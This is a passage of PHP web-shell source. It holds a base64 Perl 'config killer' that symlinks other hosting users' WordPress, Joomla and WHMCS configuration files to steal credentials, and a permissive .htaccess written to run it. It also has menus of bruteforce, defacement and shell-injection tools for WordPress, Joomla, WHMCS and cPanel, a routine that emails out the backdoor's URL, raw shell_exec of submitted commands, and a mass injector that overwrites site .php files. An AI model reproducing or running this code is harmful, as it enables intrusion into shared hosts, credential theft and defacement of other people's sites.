DZicGttdlVTOXJPK0J4MFJwYlVwWG9taWlvbE5icWRLWjlYQmZTMU8yWXIxc0hhU1ZkSkw0V2w3dFFkOHl5N1pGdlhZbHZwaUFzaGkzRVlSVldqcjJXWGh1Mlo1dFkzNjgvcDZxVGtzbU56UGd2NW9yWnFMU0ZKMmRBOFpmV1VaclpPSC9iTGZzaWNzQitFbmw3RlFVcUhxblZUSTNzUmxuMmF1bEQvbVRoNUUyWEZMWHRIZWI2MW5DcTVzZ2NZN3ZlU0FRS1dDTmppUzhEeTdkK3F3NW9RVVNMWGpSOTMxMXNsY2xUU1hsdkx3RzZabHQ5SEtqYTZlSmp6SlpFbzBjZ24wdkJtZUlabXVaalRFc2xnemdLNGpyclZtNHk5aGErUDNFcnd5d3R4dDJXVHF0YjVmcE5ETG1FMXZDdFE0bkZiQ1RKSFA4eWUxVm1XVUFzZk56YWU2aVh1M1J3bGdBVUZMV2VoSzBpM2ZCbzNIT3ZaZHcyWWp1alZRQk9IZi8rL0hQRjB4WFdsMnd4NmpteituTGwxN2hZYnJPT3EyWHptT05pdTY5Ymt0WEdPSnFMWDdpdnkrZno4VS9neXVydVNmMitmUGlpVzJ5bW55eSt6VnJ6NDNFanVHaC9YbnAveEs2OGtzKzFrRHhUZlY4S1JRZWhVaE4rRHZ1UGdoWGFaRHd5RWpJNUM1Y3U5Vk9GUzZWZTVkRnY5QVF2S3BXZGdCN1IvMldrdytURkF4TlhZK1NrN2cxMmxYMlhUZER5REx6d29NbHpLYjh1YTJpcjlLcGR1NHhNTHdDOGRhMFdsNnIyNmdYWFBuMHFJNkNBWG5FOGxsQmhZNDRhWnRFT3FQMnVReWRIRGlabVVHSmc1d0tSUW40SThNeGo4U1Z3ZFVDaS9mRHZBZnFIQitiZHJwbE1hNDJNOVhWaWNxV1lnOU1PRDh2RVNsY2Jwb3I3cFZsWU91dUU2S3BMMElaTkp6YUhTbVpCNWo5RG1zOWhTZjFJd2QwdWt5TTh5cnV0TzlaeWl2NS83eFM4MERvcFJIVmFoZGVrNjk0ZDdlYUdyWngwSFhWSXo5Y3ptK21ha29ReXZvMGh3aVd4cmc4RktKbHc1Z3ZKNjZqKzZSOElrVEtkTEdhN2VUYk9sc0g0Y05qZHorSS9zRUJhT0w3WEZqTTZCbWJQUWYyMkhpdVM5VWd0WTUrRFJuaitiR3FGRWZ5ekNua2dxQTZTbi9Fc1NhbUZRU2twUVd3Q3lmbXlJeVRTMEN6dldjdVU5RzRxVHZkOHFsZkd6TXBkVG1DK2piR1UrcC9SYWxlM0w4MSt1QkR0Z1N5MHZMWEZMSG9VcVc5OG96MHRXdDJRRDN1S3kyU0RUZU9taWFaZ1YwMjAvQXlYVFhiSDU3SnQzaXFKY3p6MEcxS2ZYZ082OWtMRUhXczdDTitaaGUxVWVmbXYyczN6c1dZSTE4eXpRb214M1YzZXhNSlpOdjhqUExOVi9Qa0RseTFmV3pTdVJoVWQ1MkVDRXdlV1FkZGxMbmU2dmVPWHdoSlBtU2NQY0M0VGxUVFk2MHlySUJYVEtzMjkxTFdLZndpNFdvQVduUXlxMTdscXBVa0x5dnk1QjhBdz0iKSkpOyA/Pg==";
  1782. $write = fwrite ($f2 ,base64_decode($sml_db));
  1783. if ($write)
  1784. {@chmod('angel/db.php',0755);}
  1785. echo "</br></br><center><b>GO TO : <a href='angel/db.php' target='_blank'>[+] MYSQL MANAGER [+]</a></center></br>";
  1786. }
  1787. }
  1788.  
  1789. # x=ckperl
  1790. elseif(isset($_GET['x']) && ($_GET['x'] == 'ckperl')) {
  1791. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ PERL</span> <span class='b8'>CONFIG KILLER ]:=O</span></b></nobr><br/><br/> ";
  1792. echo "</br></br><center><b><span class='b11'> You Can Go To : <a href='image/anu.pl' target='_blank'>[+] HERE [+]</a></center></span></br>";
  1793. if(!is_dir('image')){
  1794. $mk = @mkdir('image',0777);
  1795. $c = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n AddHandler cgi-script .pl \n Require None \n Satisfy Any";
  1796. $f =@fopen ('image/.htaccess','w');
  1797. @fwrite($f , $c);
  1798. $f2 =@fopen ('image/anu.pl','w');
  1799. $sml_perl = "IyEvdXNyL2Jpbi9wZXJsIC1JL2hvbWUvYWxqbm9mcWUvcHVibGljX2h0bWwvdHJhZmlxL2dvbmZpZy5wbA0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8dGl0bGU+WytdIENPTkZJRyBQRVJMIFsrXTwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQogZm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ3ZiLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLidhbnUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ2FudS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jYy9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nYW51LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy5waHAnLCRrb2xhLidhbnUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ2FudS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nd3AudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJ3dwLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvd3AtY29uZmlnLnBocCcsJGtvbGEuJ3dwLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nam9vbWxhLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLidqb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nam9vbWxhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9iaWxsaW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvb3JkZXIvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJzIxLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FkbWluL2NvbmZpZy5waHAnLCRrb2xhLicyMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25mX2dsb2JhbC5waHAnLCRrb2xhLicyMy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJzI0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Nvbm5lY3QucGhwJywka29sYS4nMjUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWtfY29uZi5waHAnLCRrb2xhLicyNi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2NvbmZpZy5waHAnLCRrb2xhLicyNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZXR0aW5ncy5waHAnLCRrb2xhLicyOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9mdW5jdGlvbnMucGhwJywka29sYS4nMjkudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCRrb2xhLiczMC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wb3J0YWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50YXJlYS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NlY3VyZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Byb2R1Y3QvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWVtYmVyL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudGUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbGllbnRlcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3RyaWFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdGluZy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21hbmFnZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ3dobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21hbmFnZXIvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9teWFjY291bnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid3aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hY2NvdW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nd2htY3MudHh0Jyk7DQoNCn0NCg0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQogIHJlYWQoU1RESU4sICRidWZmZXIsICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KfSBlbHNlIHsNCiAgJGJ1ZmZlciA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KfQ0KQHBhaXJzID0gc3BsaXQoLyYvLCAkYnVmZmVyKTsNCmZvcmVhY2ggJHBhaXIgKEBwYWlycykgew0KICAoJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiAgJG5hbWUgPX4gdHIvKy8gLzsNCiAgJG5hbWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJHZhbHVlID1+IHRyLysvIC87DQogICR2YWx1ZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkRk9STXskbmFtZX0gPSAkdmFsdWU7DQp9DQppZiAoJEZPUk17cGFzc30gZXEgIiIpew0KcHJpbnQgJw0KPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQo8aDE+PGk+PHU+LS09W1sgRE0gVEU0TSBdXT0tLTwvdT48L2k+PC9oMT4NCjxiciAvPg0KPGZvcm0gbWV0aG9kPSJwb3N0Ij4NCjx0ZXh0YXJlYSBuYW1lPSJwYXNzIiBzdHlsZT0iYm9yZGVyOjJweCBkb3R0ZWQgIzAwMzMwMDsgd2lkdGg6IDU0M3B4OyBoZWlnaHQ6IDQyMHB4OyBiYWNrZ3JvdW5kLWNvbG9yOiMwQzBDMEM7IGZvbnQtZmFtaWx5OlRhaG9tYTsgZm9udC1zaXplOjhwdDsgY29sb3I6I0ZGRkZGRiIgID48L3RleHRhcmVhPjxiciAvPg0KJm5ic3A7PHA+DQo8aW5wdXQgbmFtZT0idGFyIiB0eXBlPSJ0ZXh0IiBzdHlsZT0iYm9yZGVyOjFweCBkb3R0ZWQgIzAwMzMwMDsgd2lkdGg6IDIxMnB4OyBiYWNrZ3JvdW5kLWNvbG9yOiMwQzBDMEM7IGZvbnQtZmFtaWx5OlRhaG9tYTsgZm9udC1zaXplOjhwdDsgY29sb3I6I0ZGRkZGRjsgIiAgLz48YnIgLz4NCiZuYnNwOzwvcD4NCjxwPg0KPGlucHV0IG5hbWU9IlN1Ym1pdDEiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IiBIQUpBUiBDT1kgIiBzdHlsZT0iYm9yZGVyOjFweCBkb3R0ZWQgIzAwMzMwMDsgd2lkdGg6IDk5OyBmb250LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6ZToxMHB0OyBjb2xvcjojRkZGRkZGOyB0ZXh0LXRyYW5zZm9ybTp1cHBlcmNhc2U7IGhlaWdodDoyMzsgYmFja2dyb3VuZC1jb2xvcjojMEMwQzBDIiAvPjwvcD4NCjwvZm9ybT48YnIgLz48YnIgLz4nOw0KfWVsc2V7DQpAbGluZXMgPTwkRk9STXtwYXNzfT47DQokeSA9IEBsaW5lczsNCm9wZW4gKE1ZRklMRSwgIj50YXIudG1wIik7DQpwcmludCBNWUZJTEUgInRhciAtY3pmICIuJEZPUk17dGFyfS4iLnRhciAiOw0KZm9yICgka2E9MDska2E8JHk7JGthKyspew0Kd2hpbGUoQGxpbmVzWyRrYV0gID1+IG0vKC4qPyk6eDovZyl7DQombGlsKCQxKTsNCnByaW50IE1ZRklMRSAkMS4iLnR4dCAiOw0KZm9yKCRrZD0xOyRrZDwxODska2QrKyl7DQpwcmludCBNWUZJTEUgJDEuJGtkLiIudHh0ICI7DQp9DQp9DQogfQ0KcHJpbnQnPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQo8cD5TRUxFU0FJIEJPUyB8fCBDRUsgRk9MREVSIElNQUdFUzwvcD4NCjxwPiZuYnNwOzwvcD4nOw0KaWYoJEZPUk17dGFyfSBuZSAiIil7DQpvcGVuKElORk8sICJ0YXIudG1wIik7DQpAbGluZXMgPTxJTkZPPiA7DQpjbG9zZShJTkZPKTsNCnN5c3RlbShAbGluZXMpOw0KcHJpbnQnPHA+PGEgaHJlZj0iJy4kRk9STXt0YXJ9LicudGFyIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+DQo8c3BhbiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj5Eb3dubG9hZCBUYXIgRmlsZTwvc3Bhbj48L2ZvbnQ+PC9hPjwvcD4nOw0KfQ0KfQ0KIHByaW50Ig0KPC9ib2R5Pg0KPC9odG1sPiI7";
  1800. $write = fwrite($f2 ,base64_decode($sml_perl));
  1801. if($write)
  1802. {@chmod('image/anu.pl',0755);}
  1803. echo "<center><iframe src=image/anu.pl width=96% height=126% frameborder=0></iframe></div>";
  1804. }
  1805. }
  1806.  
  1807. ## ***** x=dmwp ***** ##
  1808. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmwp')) {
  1809. // wordpress bruteforce
  1810. // wordpress index changer
  1811. // wordpress password changer
  1812.  
  1813. echo '<center><br/><br/><img src="http://s.wordpress.org/about/images/logos/wordpress-logo-hoz-rgb.png"><br/><br/> <nobr><b><span class="b7">O=:[ WORDPRESS</span> <span class="b8">HACK TOOLS ]:=O</span></b></nobr><br/><br/>
  1814. <div id="menu" align="center"><table><tr>
  1815. <td align=center><b><a href="?dm='.$pwd.'&amp;x=wp1">WP BRUTEFORCE</a></b></td>
  1816. <td align=center><b><a href="?dm='.$pwd.'&amp;x=wp2">WP AUTO DEFACE</a></b></td>
  1817. <td align=center><b><a href="?dm='.$pwd.'&amp;x=wp3">WP PASSWORD CHANGER</a></b></td>
  1818. </tr></table></div><br/>';
  1819. }
  1820.  
  1821. ## ***** x=dmvb ***** ##
  1822. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmvb')) {
  1823. // vbullettin index changer
  1824. // vbulletin password changer
  1825.  
  1826. echo '<center><br/><br/>
  1827. <img src="http://forum.paradoxplaza.com/forum/images/mobile/vbulletin-logo.png"><br/><br/><nobr><b><span class="b7">O=:[ VBULLETIN</span> <span class="b8">HACK TOOLS ]:=O</span></b></nobr><br/><br/>
  1828. <div id="menu" align="center"><table><tr>
  1829. <td align=center><b><a href="?dm='.$pwd.'&amp;x=vb1">VB INDEX CHANGER</a></b></td>
  1830. <td align=center><b><a href="?dm='.$pwd.'&amp;x=vb2">VB PASSWORD CHANGER</a></b></td>
  1831. </tr></table></div><br/>';
  1832. }
  1833.  
  1834. ## ***** x=dmjm ***** ##
  1835. elseif(isset($_GET['x']) && ($_GET['x'] == 'dmjm')) {
  1836. // joomla bruteforce
  1837. // exploit joomla jce uploader
  1838. // joomla password changer
  1839.  
  1840. echo '<center><br/><br/><img src="http://www.payingdialer.com/images/joomla-logo.png"><br/><br/> <nobr><b><span class="b7">O=:[ JOOMLA</span> <span class="b8">HACK TOOLS ]:=O</span></b></nobr><br/><br/>
  1841. <div id="menu" align="center"><table><tr>
  1842. <td align=center><b><a href="?dm='.$pwd.'&amp;x=jm1">BRUTEFORCE LOGIN</a></b></td>
  1843. <td align=center><b><a href="?dm='.$pwd.'&amp;x=jm2">INDEX DEFACE</a></b></td>
  1844. <td align=center><b><a href="?dm='.$pwd.'&amp;x=jm3">JCE UPLOADER</a>
  1845. </b></td>
  1846. <td align=center><b><a href="?dm='.$pwd.'&amp;x=jm4">PASSWORD CHANGER</a></b></td>
  1847. </tr></table></div><br/>';
  1848. }
  1849.  
  1850. ## ***** x=whmcs2 ***** ##
  1851. elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs2')) {
  1852. // whmcs inject shell
  1853. // whmcs bypass security token
  1854. // whmcs password changer
  1855. // whmcs auto exploiter
  1856.  
  1857. echo '<center><br/><br/><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"><br/><br/><nobr><b><span class="b7">O=:[ WHMCS</span> <span class="b8">HACK TOOLS ]:=O</span></b></nobr><br/><br/>
  1858. <div id="menu" align="center"><table><tr>
  1859. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs1">GRAB PASSWORD CLIENT</a></b></td>
  1860. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs2">INJECT SHELL</a></b></td>
  1861. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs3">PASSWORD CHANGER</a></b></td>
  1862. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs4">BYPASS AUTH LOGIN</a></b></td>
  1863. </tr></table></div><br/>
  1864. <div id="menu" align="center"><table><tr>
  1865. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs5">WHMCS 5.2.7 [php]</a></b></td>
  1866. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs6">WHMCS 5.2.7 [python]</a></b></td>
  1867. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs7">WHMCS 5.28 [php]</a></b></td>
  1868. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs8">WHMCS 5.2.8 [python]</a></b></td>
  1869. </tr></table></div><br/>
  1870.  
  1871. <div id="menu" align="center"><table><tr>
  1872. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs9">CHECK LICENSE & VERSION</a></b></td>
  1873. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs10">v5.2.7 VULN SCANNER</a></b></td>
  1874. <td align=center><b><a href="?dm='.$pwd.'&amp;x=dmwhmcs11">SCAN CMS WHMCS</a></b></td>
  1875. </table></div><br/><br/> ';
  1876. }
  1877.  
  1878. ## ***** x=cpanel ***** ##
  1879. elseif(isset($_GET['x']) && ($_GET['x'] == 'cpanel')) {
  1880. // cpanel bruteforce
  1881. // cpanel mass deface
  1882. // cpanel bruteforce using config
  1883.  
  1884. echo '<center><br/><br/><img src="http://earthnexus.com/images/cpanel_logo.gif"><br/><br/> <nobr><b><span class="b7">O=:[ CPANEL</span> <span class="b8">HACK TOOLS ]:=O</span></b></nobr><br/><br/>
  1885. <div id="menu" align="center"><table><tr>
  1886. <td align=center><b><a href="?dm='.$pwd.'&amp;x=cp1">BRUTEFORCE CP LOGIN</a></b></td>
  1887. <td align=center><b><a href="?dm='.$pwd.'&amp;x=cp2">BRUTEFORCE CP AUTO DEFACE</a></b></td>
  1888. <td align=center><b><a href="?dm='.$pwd.'&amp;x=cp3">BRUTEFORCE CONFIG CP </a></b></td>
  1889.  
  1890. </tr></table></div><br/>';
  1891. }
  1892.  
  1893. ## ***** x=iis7 ***** ##
  1894. elseif(isset($_GET['x']) && ($_GET['x'] == 'iis7')) {
  1895.  
  1896. echo '<center><br/><br/><img src="http://www.codeblog.co.uk/wp-content/uploads/2010/06/iis7-300x215.jpg"><br/><br/> <nobr><b><span class="b7">O=:[ WINDOWS IIS7</span> <span class="b8">HACK TOOLS ]:=O</span></b></nobr><br/><br/>
  1897. <div id="menu" align="center"><table><tr>
  1898.  
  1899. <td align=center><b><a href="?dm='.$pwd.'&amp;x=iis7httpd">HTTPD EXPLOIT</a></b></td>
  1900. <td align=center><b><a href="?dm='.$pwd.'&amp;x=iis7port">PORT EXPLOIT</a></b></td>
  1901. </tr></table></div><br/>';
  1902. }
  1903.  
  1904.  
  1905. # x=posisi
  1906. elseif(isset($_GET['x']) && ($_GET['x'] == 'posisi')) {
  1907.  
  1908. function curPageURL() {
  1909. $pageURLe = 'http';
  1910. if($_SERVER["HTTPS"] == "on"){
  1911. $pageURL .= "s";
  1912. }
  1913. $pageURLe .= "://";
  1914. if ($_SERVER["SERVER_PORT"] != "80") {
  1915. $pageURLe .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
  1916. } else {
  1917. $pageURLe .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  1918. }
  1919. return $pageURLe;
  1920. }
  1921. $votremail=$_SERVER['SERVER_ADMIN'];
  1922. $objet='BACKDOOR SHELL';
  1923. $message=curPageURL();
  1924. $headers='From:'.$votremail."\r\n".'To:'.$destinataire."\r\n".'Subject:'.$objet."\r\n".'Content-type:text/plain;charset=iso-8859-1'."\r\n".'Sent:'.date('l, F d, Y H:i');
  1925. if(mail($destination,$objet,$message,$headers))
  1926. {
  1927. echo "<br><center><b></b><br/><p><b>[+] $destination [+]</b><center>";}
  1928. else
  1929. {
  1930. echo "<br><center><font size=4 color=red>Error Saving Backdoor</font><center>";
  1931. }
  1932. }
  1933. else if(isset($_POST['executecmd']))
  1934. {
  1935. $check = shell_exec($_POST['mycmd']);
  1936. echo "<textarea cols=120 rows=20 class=box>" . $check . "</textarea>";
  1937. }
  1938.  
  1939.  
  1940. elseif(isset($_GET['x']) && ($_GET['x'] == 'inject')){
  1941. ?>
  1942. <center><table id="margins" >
  1943. <tr>
  1944. <form method='POST'><input type="hidden" name="injector"/>
  1945. <tr><td width="30" class="title">
  1946. DIR : <input class="inputz" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>"/></td></tr>
  1947. <tr><td class="title">
  1948. Mode : <select class="inputz" name="mode" style="width:130px;">
  1949. <option value="Apender">SEMI INJECT</option>
  1950. <option value="Overwriter">FULL Inject</option>
  1951. </select></td></tr>
  1952. <tr><td class="title">
  1953. File Type : <input type="text" class="inputz" name="filetype" value=".php" onBlur="if(this.value=='')this.value='.php';"/></td></tr>
  1954. <tr><td colspan="2">
  1955. <textarea name="injectthis" cols="110" rows="10" class="inputz">
  1956. <?php echo base64_decode("PGh0bWw+DQo8aGVhZD48dGl0bGU+Li9INENLM0QgQlkgRzRudDNuRzNyejwvdGl0bGU+PC9oZWFkPg0KPGJvZHk+DQpURVJJTUEgS0FTSUggR1VFIEdBTlRFTkcgOnYNCjwvYm9keT4NCjwvaHRtbD4="); ?>
  1957. </textarea></td></tr>
  1958. <tr><td rowspan="2">
